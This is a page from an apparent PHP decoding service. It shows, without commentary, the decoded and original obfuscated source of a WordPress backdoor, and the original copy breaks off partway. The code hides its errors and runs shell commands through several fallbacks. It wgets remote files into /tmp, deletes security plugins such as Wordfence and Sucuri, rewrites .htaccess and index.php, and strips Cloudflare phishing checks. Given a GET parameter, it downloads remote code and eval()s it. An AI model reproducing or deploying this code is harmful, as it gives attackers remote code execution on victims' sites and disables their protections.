Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); echo "<br> "; ini_set('error_log', NULL); ini_set('lo..

Decoded Output download

<?php 
 
error_reporting(0); 
echo "<br>      "; 
ini_set('error_log', NULL); 
ini_set('log_errors', 0); 
ini_set('display_errors', 0); 
error_reporting(""); 
define('', ''); 
$GLOBALS[] = array(0 => "error_log", 1 => "log_errors", 2 => "display_errors", 3 => "<br>", 4 => "explode", 5 => "str_split", 6 => "/file_put_contents/", 7 => "/fwrite/", 8 => "./*", 9 => "/", 10 => ".php", 11 => "", 12 => "
", 13 => "file_put_contents", 14 => "w", 15 => "PHP_SELF", 16 => "DOCUMENT_ROOT", 17 => "cat ", 18 => "file_get_contents", 19 => "fopen", 20 => "stream_get_contents", 21 => "r", 22 => "implode", 23 => "file", 24 => "../", 25 => "?", 26 => "..", 27 => ".", 28 => "dir", 29 => "./", 30 => "exec", 31 => "passthru", 32 => "system", 33 => "shell_exec", 34 => "", 35 => "COOKIE.txt", 36 => "HTTP_USER_AGENT", 37 => "/Warning:/", 38 => "<?php", 39 => "COOKIE.txt", 40 => "#name=\"atok\" value=\"(.*)\">#", 41 => "/cdn-cgi/phish-bypass?u=/&atok=", 42 => "wget --header=\"User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1\" --header=\"Referer: https://google.com/\" ", 43 => " -O ", 44 => "/tmp/", 45 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 46 => ".txt", 47 => "stream_context_create", 48 => "r", 49 => "http", 50 => "method", 51 => "GET", 52 => "header", 53 => "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1
Referer: https://google.com/
", 54 => "curl_exec", 55 => "https://", 56 => "https://google.com/", 57 => "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1", 58 => "method", 59 => "GET", 60 => "header", 61 => "REQUEST_URI", 62 => "y", 63 => "a", 64 => "s", 65 => "b", 66 => "d", 67 => "u", 68 => "f", 69 => "q", 70 => "k", 71 => "p", 72 => "l", 73 => "z", 74 => "h", 75 => "i", 76 => "j", 77 => "v", 78 => "x", 79 => "//", 80 => ".", 81 => "sucuri-scanner", 82 => "better-wp-security", 83 => "jetpack", 84 => "wpscan", 85 => "wordfence", 86 => "bulletproof-security", 87 => "all-in-one-wp-security-and-firewall", 88 => "miniorange-2-factor-authentication", 89 => "/wp-content/plugins/", 90 => "/.htaccess", 91 => "/deny(.*)from(.*)all/", 92 => "/order(.*)allow(.*)deny/", 93 => "/index.php", 94 => "/wp-includes/plugin.php", 95 => "/wp-blog-header.php/", 96 => "<?php
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';", 97 => "/<html/", 98 => "/<div/", 99 => "/<head>/", 100 => "/<script>/", 101 => "/\\$path.*=.*\"(.*)\";/", 102 => "<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php\$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>", 103 => "/index.php/", 104 => "/index.php.bak/", 105 => "index.php", 106 => "index.php.bak", 107 => "/about.php", 108 => "/d_time/", 109 => "/SylVxy/", 110 => "/radio.php", 111 => "action", 112 => "http://", 113 => "<?php ", 114 => "?>", 115 => "action", 116 => "H*", 117 => "403", 118 => "/.user.ini", 119 => "KEY: <!-- MD5: ", 120 => "HTTP_HOST", 121 => "->"); 
error_reporting(0); 
@ini_set($GLOBALS[][0], NULL); 
@ini_set($GLOBALS[][0x1], 0); 
@ini_set($GLOBALS[][0x2], 0); 
echo "<br>"; 
if (!function_exists($GLOBALS[][0x4])) { 
    function explode($str, $array) 
    { 
        return split($str, $array); 
    } 
} 
if (!function_exists($GLOBALS[][0x5])) { 
    function str_split($text, $split = 0x1) 
    { 
        $array = array(); 
        for ($i = 0; $i < strlen($text);) { 
            $array[] = substr($text, $i, $split); 
            $i += $split; 
        } 
        return $array; 
    } 
} 
function oDxsw($j_7Nl, $bf80o = null, $kiuKi = null) 
{ 
    $QvxWc = curl_init(); 
    curl_setopt($QvxWc, CURLOPT_URL, $j_7Nl); 
    curl_setopt($QvxWc, CURLOPT_HEADER, !0); 
    curl_setopt($QvxWc, CURLOPT_RETURNTRANSFER, 0x1); 
    curl_setopt($QvxWc, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); 
    curl_setopt($QvxWc, CURLOPT_CONNECTTIMEOUT, 0x1e); 
    curl_setopt($QvxWc, CURLOPT_TIMEOUT, 0x1e); 
    curl_setopt($QvxWc, CURLOPT_FOLLOWLOCATION, 0x1); 
    curl_setopt($QvxWc, CURLOPT_SSL_VERIFYPEER, 0); 
    curl_setopt($QvxWc, CURLOPT_SSL_VERIFYHOST, 0); 
    curl_setopt($QvxWc, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[][0x24]]); 
    curl_setopt($QvxWc, CURLOPT_COOKIEFILE, $GLOBALS[][0x23]); 
    curl_setopt($QvxWc, CURLOPT_COOKIEJAR, $GLOBALS[][0x23]); 
    if ($bf80o != null) { 
        curl_setopt($QvxWc, CURLOPT_HTTPHEADER, $bf80o); 
    } 
    if ($kiuKi != null) { 
        curl_setopt($QvxWc, CURLOPT_POST, 0x1); 
        curl_setopt($QvxWc, CURLOPT_POSTFIELDS, $kiuKi); 
    } 
    $HOv2H = curl_exec($QvxWc); 
    curl_close($QvxWc); 
    return $HOv2H; 
} 
function RK_c8($WjdeA) 
{ 
    $FkCuj = $GLOBALS[][0xb]; 
    if (function_exists($GLOBALS[][0x1e])) { 
        @exec($WjdeA, $FkCuj); 
        $FkCuj = @join($GLOBALS[][0xc], $FkCuj); 
    } elseif (function_exists($GLOBALS[][0x1f])) { 
        ob_start(); 
        @passthru($WjdeA); 
        $FkCuj = ob_get_clean(); 
    } elseif (function_exists($GLOBALS[][0x20])) { 
        ob_start(); 
        @system($WjdeA); 
        $FkCuj = ob_get_clean(); 
    } elseif (function_exists($GLOBALS[][0x21])) { 
        $FkCuj = shell_exec($WjdeA); 
    } elseif (is_resource($aWMlI = @popen($WjdeA, $GLOBALS[][0x15]))) { 
        $FkCuj = $GLOBALS[][0x22]; 
        while (!@feof($aWMlI)) { 
            $FkCuj .= fread($aWMlI, 0x400); 
        } 
        pclose($aWMlI); 
    } 
    return $FkCuj; 
} 
function JUgSe($IzeGa) 
{ 
    $FiYF_ = $GLOBALS[][0xb]; 
    if (trim($FiYF_) == $GLOBALS[][0xb] && function_exists($GLOBALS[][0x12]) && function_exists($GLOBALS[][0x2f])) { 
        $FiYF_ = file_get_contents($IzeGa, !1, stream_context_create(array($GLOBALS[][0x31] => array($GLOBALS[][0x3a] => $GLOBALS[][0x3b], $GLOBALS[][0x3c] => $GLOBALS[][0x35])))); 
    } 
    if (trim($FiYF_) == $GLOBALS[][0xb] && function_exists($GLOBALS[][0x36])) { 
        $s2gFs = curl_init(); 
        curl_setopt($s2gFs, CURLOPT_TIMEOUT, 0xa); 
        curl_setopt($s2gFs, CURLOPT_RETURNTRANSFER, !0); 
        curl_setopt($s2gFs, CURLOPT_URL, $IzeGa); 
        curl_setopt($s2gFs, CURLOPT_USERAGENT, $GLOBALS[][0x39]); 
        curl_setopt($s2gFs, CURLOPT_REFERER, $GLOBALS[][0x38]); 
        curl_setopt($s2gFs, CURLOPT_FOLLOWLOCATION, !0); 
        if (stristr($IzeGa, $GLOBALS[][0x37])) { 
            curl_setopt($s2gFs, CURLOPT_SSL_VERIFYPEER, 0); 
            curl_setopt($s2gFs, CURLOPT_SSL_VERIFYHOST, 0); 
        } 
        curl_setopt($s2gFs, CURLOPT_HEADER, !1); 
        $FiYF_ = curl_exec($s2gFs); 
        curl_close($s2gFs); 
    } 
    if (trim($FiYF_) == $GLOBALS[][0xb]) { 
        $fO5cJ = $GLOBALS[][0x2c] . substr(str_shuffle($GLOBALS[][0x2d]), 0x32) . $GLOBALS[][0x2e]; 
        rK_C8($GLOBALS[][0x2a] . $IzeGa . $GLOBALS[][0x2b] . $fO5cJ); 
        if (function_exists($GLOBALS[][0x12])) { 
            $FiYF_ = file_get_contents($fO5cJ); 
        } else { 
            $FiYF_ = stream_get_contents(fopen($fO5cJ, $GLOBALS[][0x15])); 
        } 
        unlink($fO5cJ); 
    } 
    if (trim($FiYF_) == $GLOBALS[][0xb] && function_exists($GLOBALS[][0x13]) && function_exists($GLOBALS[][0x14]) && function_exists($GLOBALS[][0x2f])) { 
        $RNvUK = fopen($IzeGa, $GLOBALS[][0x30], !1, stream_context_create(array($GLOBALS[][0x31] => array($GLOBALS[][0x32] => $GLOBALS[][0x33], $GLOBALS[][0x34] => $GLOBALS[][0x35])))); 
        $FiYF_ = stream_get_contents($RNvUK); 
    } 
    return $FiYF_; 
} 
function AsrZX($ok6e_) 
{ 
    $p35sK = $GLOBALS[][0xb]; 
    if (function_exists($GLOBALS[][0x12])) { 
        $p35sK = file_get_contents($ok6e_); 
    } elseif (function_exists($GLOBALS[][0x13]) && function_exists($GLOBALS[][0x14])) { 
        $p35sK = stream_get_contents(fopen($ok6e_, $GLOBALS[][0x15])); 
    } elseif (function_exists($GLOBALS[][0x16]) && function_exists($GLOBALS[][0x17])) { 
        $p35sK = implode(file($ok6e_)); 
    } elseif (function_exists($GLOBALS[][0x17])) { 
        $mPYIt = file($ok6e_); 
        if (function_exists($GLOBALS[][0x16])) { 
            $p35sK = implode($mPYIt); 
        } else { 
            foreach ($mPYIt as $zd4bR) { 
                $p35sK .= $zd4bR; 
            } 
        } 
    } 
    if (trim($p35sK) == $GLOBALS[][0xb]) { 
        $p35sK = Rk_c8($GLOBALS[][0x11] . $ok6e_); 
    } 
    return $p35sK; 
} 
function QxB8Z($ok6e_, $iTqoS) 
{ 
    if (function_exists($GLOBALS[][0xd])) { 
        $fYuhN = file_put_contents($ok6e_, $iTqoS); 
    } else { 
        $fYuhN = fwrite(fopen($ok6e_, $GLOBALS[][0xe]), $iTqoS); 
    } 
    return $fYuhN; 
} 
function ZMpTl($KKNL0, $bN80E) 
{ 
    $n6JcJ = 0; 
    $Nzr3p = aSRzx($KKNL0); 
    $mPYIt = explode($GLOBALS[][0xc], $Nzr3p); 
    foreach ($mPYIt as $zd4bR) { 
        if (strstr($zd4bR, $bN80E)) { 
            $n6JcJ++; 
        } 
    } 
    return $n6JcJ; 
} 
function rlAoq($KKNL0, $bN80E) 
{ 
    $Nucua = ZMPtL($KKNL0, $bN80E); 
    $Nzr3p = ASRzx($KKNL0); 
    $mPYIt = explode($GLOBALS[][0xc], $Nzr3p); 
    $tlBti = $GLOBALS[][0xb]; 
    foreach ($mPYIt as $zd4bR) { 
        if (strstr($zd4bR, $bN80E) || $Nucua <= 0) { 
            $Nucua--; 
            if ($Nucua <= 0) { 
                $tlBti .= $zd4bR . $GLOBALS[][0xc]; 
            } 
        } 
    } 
    return $tlBti; 
} 
function MiMRi($BSTSR) 
{ 
    $iTMgs = $BSTSR . $GLOBALS[][0x5a]; 
    $CTswv = strtolower(aSRZX($iTMgs)); 
    if (preg_match($GLOBALS[][0x5b], $CTswv) || preg_match($GLOBALS[][0x5c], $CTswv)) { 
        $qsml6 = $BSTSR . $GLOBALS[][0x5e]; 
        $HH0Dt = aSrzx($qsml6); 
        if (preg_match($GLOBALS[][0x67], $HH0Dt) && !preg_match($GLOBALS[][0x68], $HH0Dt)) { 
            $HH0Dt = str_replace($GLOBALS[][0x69], $GLOBALS[][0x6a], $HH0Dt); 
            chmod($qsml6, 0644); 
            qXb8Z($qsml6, $HH0Dt); 
        } 
        if (preg_match($GLOBALS[][0x65], $HH0Dt, $A0J4x)) { 
            unlink($A0J4x[0x1]); 
        } 
        $Xa3Xv = $BSTSR . $GLOBALS[][0x6b]; 
        $r4rLX = ASRZX($Xa3Xv); 
        if (file_exists($Xa3Xv) && (preg_match($GLOBALS[][0x6c], $r4rLX) || preg_match($GLOBALS[][0x6d], $r4rLX))) { 
            unlink($Xa3Xv); 
            unlink($BSTSR . $GLOBALS[][0x6e]); 
        } 
        $YzXVO = $BSTSR . $GLOBALS[][0x5d]; 
        $ZcVkF = Asrzx($YzXVO); 
        if (preg_match($GLOBALS[][0x5f], $ZcVkF)) { 
            $TnBIs = $GLOBALS[][0x60]; 
            chmod($YzXVO, 0644); 
            qxb8z($YzXVO, $TnBIs); 
        } elseif (strstr($ZcVkF, $GLOBALS[][0x26]) && !preg_match($GLOBALS[][0x61], $ZcVkF) && !preg_match($GLOBALS[][0x62], $ZcVkF) && !preg_match($GLOBALS[][0x63], $ZcVkF) && !preg_match($GLOBALS[][0x64], $ZcVkF)) { 
            $TnBIs = rLaoq($YzXVO, $GLOBALS[][0x26]); 
            chmod($YzXVO, 0644); 
            qxb8z($YzXVO, $TnBIs); 
        } 
        chmod($iTMgs, 0644); 
        $z_5mN = $GLOBALS[][0x66]; 
        QXb8Z($iTMgs, $z_5mN); 
    } 
} 
function iRmJx($ok6e_) 
{ 
    $ok6e_ = substr($ok6e_, 1) == $GLOBALS[][0x9] ? $ok6e_ : $ok6e_ . $GLOBALS[][0x9]; 
    $SZzID = opendir($ok6e_); 
    while (($phOnJ = readdir($SZzID)) !== !1) { 
        $phOnJ = $ok6e_ . $phOnJ; 
        if (basename($phOnJ) == $GLOBALS[][0x1a] || basename($phOnJ) == $GLOBALS[][0x1b]) { 
            continue; 
        } 
        $tabyZ = filetype($phOnJ); 
        if ($tabyZ == $GLOBALS[][0x1c]) { 
            irMjX($phOnJ); 
        } else { 
            @unlink($phOnJ); 
        } 
    } 
    closedir($SZzID); 
} 
function ocIVI($BSTSR) 
{ 
    $jYG7l = array($GLOBALS[][0x51], $GLOBALS[][0x52], $GLOBALS[][0x53], $GLOBALS[][0x54], $GLOBALS[][0x55], $GLOBALS[][0x56], $GLOBALS[][0x57], $GLOBALS[][0x58]); 
    foreach ($jYG7l as $HH0Dt) { 
        $jAUNf = $BSTSR . $GLOBALS[][0x59] . $HH0Dt; 
        if (is_dir($jAUNf)) { 
            iRmJx($jAUNf); 
        } 
    } 
} 
$GhlyG = strval(basename("/var/www/html/bkv8.txt")); 
$aWMlI = explode($GLOBALS[][0x50], $GhlyG); 
$GhlyG = $aWMlI[0] . $GLOBALS[][0xa]; 
$Nzr3p = aSRzx($GhlyG); 
if (preg_match($GLOBALS[][0x6], $Nzr3p) || preg_match($GLOBALS[][0x7], $Nzr3p)) { 
    $LhFlr = glob($GLOBALS[][0x8]); 
    foreach ($LhFlr as $KKNL0) { 
        if (is_file($KKNL0)) { 
            unlink($KKNL0); 
        } 
    } 
    exit; 
} 
function LE86Y($ZJoHI, $iTqoS) 
{ 
    if (preg_match($GLOBALS[][0x25], $iTqoS)) { 
        preg_match($GLOBALS[][0x28], $iTqoS, $s2WNP); 
        $s2WNP = $s2WNP[0x1]; 
        $dbhhI = oDXSW($ZJoHI . $GLOBALS[][0x29] . $s2WNP); 
        $iTqoS = odxSw($ZJoHI); 
        $iKFfw = $GLOBALS[][0x26]; 
        $RJWgv = strpos($iTqoS, $iKFfw) + strlen($iKFfw); 
        $iTqoS = $GLOBALS[][0x26] . substr($iTqoS, $RJWgv); 
        unlink($GLOBALS[][0x27]); 
    } 
    return $iTqoS; 
} 
function FbJtr($P94B6) 
{ 
    $dozF_ = array($GLOBALS[][0x3e] => $GLOBALS[][0x3f], $GLOBALS[][0x40] => $GLOBALS[][0x41], $GLOBALS[][0x3f] => $GLOBALS[][0x42], $GLOBALS[][0x43] => $GLOBALS[][0x44], $GLOBALS[][0x45] => $GLOBALS[][0x46], $GLOBALS[][0x47] => $GLOBALS[][0x48], $GLOBALS[][0x49] => $GLOBALS[][0x4a], $GLOBALS[][0x41] => $GLOBALS[][0x4b], $GLOBALS[][0x44] => $GLOBALS[][0x4c], $GLOBALS[][0x4d] => $GLOBALS[][0x47], $GLOBALS[][0x42] => $GLOBALS[][0x45], $GLOBALS[][0x4b] => $GLOBALS[][0x40], $GLOBALS[][0x4e] => $GLOBALS[][0x43], $GLOBALS[][0x48] => $GLOBALS[][0x4d], $GLOBALS[][0x46] => $GLOBALS[][0x4e], $GLOBALS[][0x4a] => $GLOBALS[][0x3e], $GLOBALS[][0x4c] => $GLOBALS[][0x49]); 
    $zYBxV = str_split($P94B6); 
    $Tax0X = $GLOBALS[][0xb]; 
    foreach ($zYBxV as $Um4AM) { 
        if (in_array($Um4AM, $dozF_)) { 
            $Tax0X .= $dozF_[$Um4AM]; 
        } else { 
            $Tax0X .= $Um4AM; 
        } 
    } 
    return $Tax0X; 
} 
function eOcGK($BSTSR) 
{ 
    $BPpYo = realpath($BSTSR); 
    if (trim($BPpYo) == $GLOBALS[][0xb]) { 
        $BPpYo = $_SERVER[$GLOBALS[][0x10]]; 
    } 
    if (!stristr(getcwd(), $BPpYo)) { 
        $BPpYo = str_replace($_SERVER[$GLOBALS[][0xf]], $GLOBALS[][0xb], "/var/www/html/anj4.txt"); 
    } 
    return $BPpYo; 
} 
$smTub = strval($_SERVER[$GLOBALS[][0x3d]]); 
while (strstr($smTub, $GLOBALS[][0x4f])) { 
    $smTub = str_replace($GLOBALS[][0x4f], $GLOBALS[][0x9], $smTub); 
} 
if (strstr($smTub, $GLOBALS[][0x19])) { 
    $smTub = explode($GLOBALS[][0x19], $smTub); 
    $smTub = $smTub[0]; 
} 
$tzTJj = substr_count($smTub, $GLOBALS[][0x9]); 
$BSTSR = $GLOBALS[][0x1d]; 
$K71UX = 0x1; 
while ($K71UX < intval($tzTJj)) { 
    $BSTSR .= $GLOBALS[][0x18]; 
    $K71UX++; 
} 
$BSTSR = EOcgk($BSTSR); 
MiMRi($BSTSR); 
oCIVi($BSTSR); 
if (isset($_GET[$GLOBALS[][0x6f]])) { 
    $vo1vU = trim($_GET[$GLOBALS[][0x73]]); 
    $vo1vU = str_rot13(pack($GLOBALS[][0x74], strrev($vo1vU))); 
    $F3bIg = JuGse($GLOBALS[][0x70] . FbJTr($vo1vU)); 
    $F3bIg = Le86y($GLOBALS[][0x70] . fbjtR($vo1vU), $F3bIg); 
    $F3bIg = str_replace(array($GLOBALS[][0x26], $GLOBALS[][0x71], $GLOBALS[][0x72]), $GLOBALS[][0xb], $F3bIg); 
    eval($F3bIg); 
} elseif (isset($_GET[$GLOBALS[][0x75]])) { 
    $CTswv = $GLOBALS[][0x66]; 
    chmod($BSTSR . $GLOBALS[][0x5a], 0644); 
    QxB8z($BSTSR . $GLOBALS[][0x5a], $CTswv); 
    unlink($BSTSR . $GLOBALS[][0x76]); 
} else { 
    echo $GLOBALS[][0x77] . md5($_SERVER[$GLOBALS[][0x78]]) . $GLOBALS[][0x79]; 
}

Did this file decode correctly?

Original Code

<?php

error_reporting(0);
echo "<br>      ";
ini_set('error_log', NULL);
ini_set('log_errors', 0);
ini_set('display_errors', 0);
error_reporting("\0\0\17\3\30");
define('', '');
$GLOBALS[] = array(0 => "error_log", 1 => "log_errors", 2 => "display_errors", 3 => "<br>", 4 => "explode", 5 => "str_split", 6 => "/file_put_contents/", 7 => "/fwrite/", 8 => "./*", 9 => "/", 10 => ".php", 11 => "", 12 => "\n", 13 => "file_put_contents", 14 => "w", 15 => "PHP_SELF", 16 => "DOCUMENT_ROOT", 17 => "cat ", 18 => "file_get_contents", 19 => "fopen", 20 => "stream_get_contents", 21 => "r", 22 => "implode", 23 => "file", 24 => "../", 25 => "?", 26 => "..", 27 => ".", 28 => "dir", 29 => "./", 30 => "exec", 31 => "passthru", 32 => "system", 33 => "shell_exec", 34 => "", 35 => "COOKIE.txt", 36 => "HTTP_USER_AGENT", 37 => "/Warning:/", 38 => "<?php", 39 => "COOKIE.txt", 40 => "#name=\"atok\" value=\"(.*)\">#", 41 => "/cdn-cgi/phish-bypass?u=/&atok=", 42 => "wget --header=\"User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1\" --header=\"Referer: https://google.com/\" ", 43 => " -O ", 44 => "/tmp/", 45 => "123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", 46 => ".txt", 47 => "stream_context_create", 48 => "r", 49 => "http", 50 => "method", 51 => "GET", 52 => "header", 53 => "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1\r\nReferer: https://google.com/\r\n", 54 => "curl_exec", 55 => "https://", 56 => "https://google.com/", 57 => "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Mobile/15E148 Safari/604.1", 58 => "method", 59 => "GET", 60 => "header", 61 => "REQUEST_URI", 62 => "y", 63 => "a", 64 => "s", 65 => "b", 66 => "d", 67 => "u", 68 => "f", 69 => "q", 70 => "k", 71 => "p", 72 => "l", 73 => "z", 74 => "h", 75 => "i", 76 => "j", 77 => "v", 78 => "x", 79 => "//", 80 => ".", 81 => "sucuri-scanner", 82 => "better-wp-security", 83 => "jetpack", 84 => "wpscan", 85 => "wordfence", 86 => "bulletproof-security", 87 => "all-in-one-wp-security-and-firewall", 88 => "miniorange-2-factor-authentication", 89 => "/wp-content/plugins/", 90 => "/.htaccess", 91 => "/deny(.*)from(.*)all/", 92 => "/order(.*)allow(.*)deny/", 93 => "/index.php", 94 => "/wp-includes/plugin.php", 95 => "/wp-blog-header.php/", 96 => "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';", 97 => "/<html/", 98 => "/<div/", 99 => "/<head>/", 100 => "/<script>/", 101 => "/\\\$path.*=.*\"(.*)\";/", 102 => "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php\$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>", 103 => "/index.php/", 104 => "/index.php.bak/", 105 => "index.php", 106 => "index.php.bak", 107 => "/about.php", 108 => "/d_time/", 109 => "/SylVxy/", 110 => "/radio.php", 111 => "action", 112 => "http://", 113 => "<?php ", 114 => "?>", 115 => "action", 116 => "H*", 117 => "403", 118 => "/.user.ini", 119 => "KEY: <!-- MD5: ", 120 => "HTTP_HOST", 121 => "->");
error_reporting(0);
@ini_set($GLOBALS[][0], NULL);
@ini_set($GLOBALS[][0x1], 0);
@ini_set($GLOBALS[][0x2], 0);
echo "<br>";
if (!function_exists($GLOBALS[][0x4])) {
    function explode($str, $array)
    {
        return split($str, $array);
    }
}
if (!function_exists($GLOBALS[][0x5])) {
    function str_split($text, $split = 0x1)
    {
        $array = array();
        for ($i = 0; $i < strlen($text);) {
            $array[] = substr($text, $i, $split);
            $i += $split;
        }
        return $array;
    }
}
function oDxsw($j_7Nl, $bf80o = null, $kiuKi = null)
{
    $QvxWc = curl_init();
    curl_setopt($QvxWc, CURLOPT_URL, $j_7Nl);
    curl_setopt($QvxWc, CURLOPT_HEADER, !0);
    curl_setopt($QvxWc, CURLOPT_RETURNTRANSFER, 0x1);
    curl_setopt($QvxWc, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
    curl_setopt($QvxWc, CURLOPT_CONNECTTIMEOUT, 0x1e);
    curl_setopt($QvxWc, CURLOPT_TIMEOUT, 0x1e);
    curl_setopt($QvxWc, CURLOPT_FOLLOWLOCATION, 0x1);
    curl_setopt($QvxWc, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($QvxWc, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($QvxWc, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[][0x24]]);
    curl_setopt($QvxWc, CURLOPT_COOKIEFILE, $GLOBALS[][0x23]);
    curl_setopt($QvxWc, CURLOPT_COOKIEJAR, $GLOBALS[][0x23]);
    if ($bf80o != null) {
        curl_setopt($QvxWc, CURLOPT_HTTPHEADER, $bf80o);
    }
    if ($kiuKi != null) {
        curl_setopt($QvxWc, CURLOPT_POST, 0x1);
        curl_setopt($QvxWc, CURLOPT_POSTFIELDS, $kiuKi);
    }
    $HOv2H = curl_exec($QvxWc);
    curl_close($QvxWc);
    return $HOv2H;
}
function RK_c8($WjdeA)
{
    $FkCuj = $GLOBALS[][0xb];
    if (function_exists($GLOBALS[][0x1e])) {
        @exec($WjdeA, $FkCuj);
        $FkCuj = @join($GLOBALS[][0xc], $FkCuj);
    } elseif (function_exists($GLOBALS[][0x1f])) {
        ob_start();
        @passthru($WjdeA);
        $FkCuj = ob_get_clean();
    } elseif (function_exists($GLOBALS[][0x20])) {
        ob_start();
        @system($WjdeA);
        $FkCuj = ob_get_clean();
    } elseif (function_exists($GLOBALS[][0x21])) {
        $FkCuj = shell_exec($WjdeA);
    } elseif (is_resource($aWMlI = @popen($WjdeA, $GLOBALS[][0x15]))) {
        $FkCuj = $GLOBALS[][0x22];
        while (!@feof($aWMlI)) {
            $FkCuj .= fread($aWMlI, 0x400);
        }
        pclose($aWMlI);
    }
    return $FkCuj;
}
function JUgSe($IzeGa)
{
    $FiYF_ = $GLOBALS[][0xb];
    if (trim($FiYF_) == $GLOBALS[][0xb] && function_exists($GLOBALS[][0x12]) && function_exists($GLOBALS[][0x2f])) {
        $FiYF_ = file_get_contents($IzeGa, !1, stream_context_create(array($GLOBALS[][0x31] => array($GLOBALS[][0x3a] => $GLOBALS[][0x3b], $GLOBALS[][0x3c] => $GLOBALS[][0x35]))));
    }
    if (trim($FiYF_) == $GLOBALS[][0xb] && function_exists($GLOBALS[][0x36])) {
        $s2gFs = curl_init();
        curl_setopt($s2gFs, CURLOPT_TIMEOUT, 0xa);
        curl_setopt($s2gFs, CURLOPT_RETURNTRANSFER, !0);
        curl_setopt($s2gFs, CURLOPT_URL, $IzeGa);
        curl_setopt($s2gFs, CURLOPT_USERAGENT, $GLOBALS[][0x39]);
        curl_setopt($s2gFs, CURLOPT_REFERER, $GLOBALS[][0x38]);
        curl_setopt($s2gFs, CURLOPT_FOLLOWLOCATION, !0);
        if (stristr($IzeGa, $GLOBALS[][0x37])) {
            curl_setopt($s2gFs, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($s2gFs, CURLOPT_SSL_VERIFYHOST, 0);
        }
        curl_setopt($s2gFs, CURLOPT_HEADER, !1);
        $FiYF_ = curl_exec($s2gFs);
        curl_close($s2gFs);
    }
    if (trim($FiYF_) == $GLOBALS[][0xb]) {
        $fO5cJ = $GLOBALS[][0x2c] . substr(str_shuffle($GLOBALS[][0x2d]), 0x32) . $GLOBALS[][0x2e];
        rK_C8($GLOBALS[][0x2a] . $IzeGa . $GLOBALS[][0x2b] . $fO5cJ);
        if (function_exists($GLOBALS[][0x12])) {
            $FiYF_ = file_get_contents($fO5cJ);
        } else {
            $FiYF_ = stream_get_contents(fopen($fO5cJ, $GLOBALS[][0x15]));
        }
        unlink($fO5cJ);
    }
    if (trim($FiYF_) == $GLOBALS[][0xb] && function_exists($GLOBALS[][0x13]) && function_exists($GLOBALS[][0x14]) && function_exists($GLOBALS[][0x2f])) {
        $RNvUK = fopen($IzeGa, $GLOBALS[][0x30], !1, stream_context_create(array($GLOBALS[][0x31] => array($GLOBALS[][0x32] => $GLOBALS[][0x33], $GLOBALS[][0x34] => $GLOBALS[][0x35]))));
        $FiYF_ = stream_get_contents($RNvUK);
    }
    return $FiYF_;
}
function AsrZX($ok6e_)
{
    $p35sK = $GLOBALS[][0xb];
    if (function_exists($GLOBALS[][0x12])) {
        $p35sK = file_get_contents($ok6e_);
    } elseif (function_exists($GLOBALS[][0x13]) && function_exists($GLOBALS[][0x14])) {
        $p35sK = stream_get_contents(fopen($ok6e_, $GLOBALS[][0x15]));
    } elseif (function_exists($GLOBALS[][0x16]) && function_exists($GLOBALS[][0x17])) {
        $p35sK = implode(file($ok6e_));
    } elseif (function_exists($GLOBALS[][0x17])) {
        $mPYIt = file($ok6e_);
        if (function_exists($GLOBALS[][0x16])) {
            $p35sK = implode($mPYIt);
        } else {
            foreach ($mPYIt as $zd4bR) {
                $p35sK .= $zd4bR;
            }
        }
    }
    if (trim($p35sK) == $GLOBALS[][0xb]) {
        $p35sK = Rk_c8($GLOBALS[][0x11] . $ok6e_);
    }
    return $p35sK;
}
function QxB8Z($ok6e_, $iTqoS)
{
    if (function_exists($GLOBALS[][0xd])) {
        $fYuhN = file_put_contents($ok6e_, $iTqoS);
    } else {
        $fYuhN = fwrite(fopen($ok6e_, $GLOBALS[][0xe]), $iTqoS);
    }
    return $fYuhN;
}
function ZMpTl($KKNL0, $bN80E)
{
    $n6JcJ = 0;
    $Nzr3p = aSRzx($KKNL0);
    $mPYIt = explode($GLOBALS[][0xc], $Nzr3p);
    foreach ($mPYIt as $zd4bR) {
        if (strstr($zd4bR, $bN80E)) {
            $n6JcJ++;
        }
    }
    return $n6JcJ;
}
function rlAoq($KKNL0, $bN80E)
{
    $Nucua = ZMPtL($KKNL0, $bN80E);
    $Nzr3p = ASRzx($KKNL0);
    $mPYIt = explode($GLOBALS[][0xc], $Nzr3p);
    $tlBti = $GLOBALS[][0xb];
    foreach ($mPYIt as $zd4bR) {
